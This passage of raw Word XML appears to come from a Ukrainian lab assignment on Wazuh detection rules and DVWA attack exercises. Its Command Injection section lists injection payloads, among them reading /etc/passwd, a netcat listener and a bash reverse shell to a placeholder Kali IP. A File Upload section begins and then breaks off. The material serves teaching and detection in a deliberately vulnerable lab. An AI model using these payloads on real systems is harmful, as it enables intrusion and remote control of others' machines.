    <w:p w14:paraId="4EC7B3EA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url&gt;upload&lt;/url&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4DFEE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regex type="pcre2"&gt;\.php|\.phtml|\.php3|\.php4|\.php5&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7138240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description&gt;Suspicious file upload: PHP file detected&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CA1687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mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CEFCB5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  &lt;id&gt;T1105&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC1600D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/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688ECAAE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/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49026E12" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="00352FF0" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D4581DA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!-- Detect web shell access --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9375D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rule id="100061" level="12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1BA2E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if_group&gt;web&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01443E06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url&gt;uploads/&lt;/url&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C2D12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regex type="pcre2"&gt;(\?|&amp;amp;)(cmd|command|exec|shell)=&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1829CA8F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description&gt;Web shell access detected: Command parameter in uploaded file&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164C85B7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mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B26A54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  &lt;id&gt;T1505&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A5D41F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/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC782EA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/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F61E71" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="00352FF0" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53FAA58F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!-- Detect double extension --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AE52A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&lt;rule id="100062" level="10"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A5227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if_group&gt;web&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0526F9C2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regex type="pcre2"&gt;\.(php|asp|jsp)\.(jpg|png|gif|txt)&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43483D80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description&gt;Suspicious file upload: Double extension detected&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456C2FEA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mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62770ABC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  &lt;id&gt;T1105&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE3A943" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="00352FF0" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F29BB7" w14:textId="71C3245A" w:rsidR="002D2D03" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574C8F53" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="00352FF0" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2346CF" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="003B650C" w:rsidRDefault="002D2D03" w:rsidP="007D1D84">
      <w:pPr>
        <w:pStyle w:val="a3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запустіть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wazuh-manager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603D00" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="000B517F" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Виконайте в терміналі:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421125FB" w14:textId="77777777" w:rsidR="002D2D03" w:rsidRPr="003B650C" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B517F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidRPr="00950555">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>docker restart wazuh-manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A01CE85" w14:textId="52ADCEE8" w:rsidR="002D2D03" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a3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ий аналіз створених правил.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F035FD2" w14:textId="4D561D24" w:rsidR="002D2D03" w:rsidRDefault="002D2D03" w:rsidP="002D2D03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еріть одне правило з групи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2D2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2D2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онайте його детальний аналіз.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319A97BC" w14:textId="70E78666" w:rsidR="002D2D03" w:rsidRDefault="002D2D03" w:rsidP="002D2D03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еріть одне правило з груп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D2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2D2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онайте його детальний аналіз.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1BFB60" w14:textId="719BA8EC" w:rsidR="002D2D03" w:rsidRDefault="002D2D03" w:rsidP="002D2D0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аналізу необхідно описати:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAC6915" w14:textId="6FF9FD6E" w:rsidR="002D2D03" w:rsidRDefault="002D2D03" w:rsidP="002D2D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а.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647C6011" w14:textId="5D98C3D0" w:rsidR="002D2D03" w:rsidRDefault="002D2D03" w:rsidP="002D2D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критичності події.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489CF7D3" w14:textId="17B5E3FD" w:rsidR="002D2D03" w:rsidRDefault="002D2D03" w:rsidP="002D2D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у спрацювання.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F81DAE" w14:textId="1597CCFB" w:rsidR="002D2D03" w:rsidRDefault="002D2D03" w:rsidP="002D2D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рний вираз.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9F6ED4" w14:textId="307119C8" w:rsidR="002D2D03" w:rsidRDefault="002D2D03" w:rsidP="002D2D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(що саме аналізується у запитах або логах).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF6D609" w14:textId="55415CE0" w:rsidR="002D2D03" w:rsidRPr="002D2D03" w:rsidRDefault="002D2D03" w:rsidP="002D2D0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TRE ATT&amp;CK ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4794D8B6" w14:textId="6E0BBAFD" w:rsidR="002D2D03" w:rsidRPr="002D2D03" w:rsidRDefault="002D2D03" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a3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2D0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у або </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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може викликати спрацювання правила.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468CF659" w14:textId="49486504" w:rsidR="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057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2D2D0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D05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 Injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C8901D" w14:textId="379F6B3E" w:rsid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діть до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 Injection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VW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4923A6" w14:textId="072C8E45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іть легитімн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адресу для виконанн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D057D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DA7071" w14:textId="0C379882" w:rsidR="002D057D" w:rsidRPr="002D2D03" w:rsidRDefault="002D057D" w:rsidP="002D2D03">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D658E82" w14:textId="65D22127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уйте базовий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3351B1" w14:textId="77777777" w:rsidR="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>127.0.0.1; whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547D76D1" w14:textId="0E6D09BD" w:rsidR="002D057D" w:rsidRPr="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D0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спрацювало – побачите результат обох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whoami</w:t>
      </w:r>
      <w:r w:rsidRPr="002D057D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A25EC" w14:textId="265D61F4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йте інформацію про користувача:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123703F0" w14:textId="67838443" w:rsidR="002D057D" w:rsidRPr="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>127.0.0.1; id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C952723" w14:textId="2C713194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ОС:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47666C8B" w14:textId="44555FD6" w:rsidR="002D2D03" w:rsidRPr="00FB1FF8" w:rsidRDefault="002D057D" w:rsidP="00FB1FF8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>127.0.0.1 &amp;&amp; uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75869D16" w14:textId="79583140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файлів:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41402278" w14:textId="478DAC5F" w:rsidR="002D057D" w:rsidRPr="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>127.0.0.1; ls -la /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8ED090" w14:textId="4CEDD5F3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/etc/passwd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C0B781" w14:textId="5B35A231" w:rsidR="002D057D" w:rsidRPr="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>127.0.0.1; cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09089071" w14:textId="50C7C845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а директорія:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358C901F" w14:textId="1B5AE19A" w:rsidR="002D057D" w:rsidRPr="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>127.0.0.1 | pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1E76C2" w14:textId="297D2815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2D0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D0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йте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0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ener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D445A0" w14:textId="41776719" w:rsidR="002D057D" w:rsidRPr="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C03EE2E" w14:textId="3FC4668E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йт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2D05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D05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F96E64"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 </w:t>
      </w:r>
      <w:r w:rsidR="00F96E6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96E64" w:rsidRPr="00F96E64">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00F9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172.17.*.*</w:t>
      </w:r>
      <w:r w:rsidRPr="002D057D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7401AE53" w14:textId="071AC1EE" w:rsidR="002D057D" w:rsidRPr="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC7664F" w14:textId="49980D89" w:rsidR="002D057D" w:rsidRPr="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057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VWA</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB1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</w:t>
      </w:r>
      <w:r w:rsidR="00FB1FF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у</w:t>
      </w:r>
      <w:r w:rsidR="00FB1FF8"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</w:t>
      </w:r>
      <w:r w:rsidR="00FB1FF8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FB1FF8" w:rsidRPr="00FB1FF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB1FF8"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E0548" w14:textId="77777777" w:rsidR="002D057D" w:rsidRPr="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D057D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>127.0.0.1; bash -c 'bash -i &gt;&amp; /dev/tcp/YOUR_KALI_IP/4444 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104F1958" w14:textId="1B88CE7F" w:rsidR="002D057D" w:rsidRPr="002D057D" w:rsidRDefault="002D057D" w:rsidP="00FB1FF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netcat</w:t>
      </w:r>
      <w:r w:rsidRPr="002D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ener</w:t>
      </w:r>
      <w:r w:rsidRPr="002D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команди для підтвердження доступу:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034D0AE9" w14:textId="77777777" w:rsidR="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA82BAA" w14:textId="77777777" w:rsidR="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779FFA3D" w14:textId="77777777" w:rsidR="002D057D" w:rsidRDefault="002D057D" w:rsidP="002D057D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314659AD" w14:textId="2676D79B" w:rsidR="00352FF0" w:rsidRPr="00F96E64" w:rsidRDefault="002D057D" w:rsidP="00F96E6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йдіть з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2D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2D057D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CC8EB9" w14:textId="53CC9866" w:rsidR="002D057D" w:rsidRDefault="00352FF0" w:rsidP="00352FF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7D1D8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352F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le Upload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCEE06D" w14:textId="2A454438" w:rsid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1C472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діть до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VWA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8C7F3E" w14:textId="2270FDE6" w:rsidR="00352FF0" w:rsidRPr="00352FF0" w:rsidRDefault="00FB1FF8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іть</w:t>
      </w:r>
      <w:r w:rsidR="00352FF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> легітимне зображення для тестування.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0357832D" w14:textId="63C40323" w:rsidR="00352FF0" w:rsidRPr="00352FF0" w:rsidRDefault="00352FF0" w:rsidP="007D1D84">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"># У </w:t>
      </w:r>
      <w:r>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00352FF0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> терміналі</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147CF39A" w14:textId="1E51C62E" w:rsidR="00352FF0" w:rsidRPr="00F96E64" w:rsidRDefault="00352FF0" w:rsidP="007D1D84">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pinimg</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/736</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2/17/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>217</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>81</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>53554424</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>432</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bab</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>077</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96E64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C323B4" w14:textId="1F893812" w:rsid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r w:rsidR="00F96E64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DVW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37F6A7" w14:textId="75CBE43C" w:rsid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те </w:t>
      </w:r>
      <w:r w:rsidR="00FB1FF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>місце зберігання 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звичай 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ackable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34F431F" w14:textId="4DE6A57F" w:rsidR="00352FF0" w:rsidRP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стий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-shell.php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FD5A5" w14:textId="0F75D17F" w:rsidR="00F96E64" w:rsidRPr="00F96E64" w:rsidRDefault="00F96E64" w:rsidP="00352FF0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
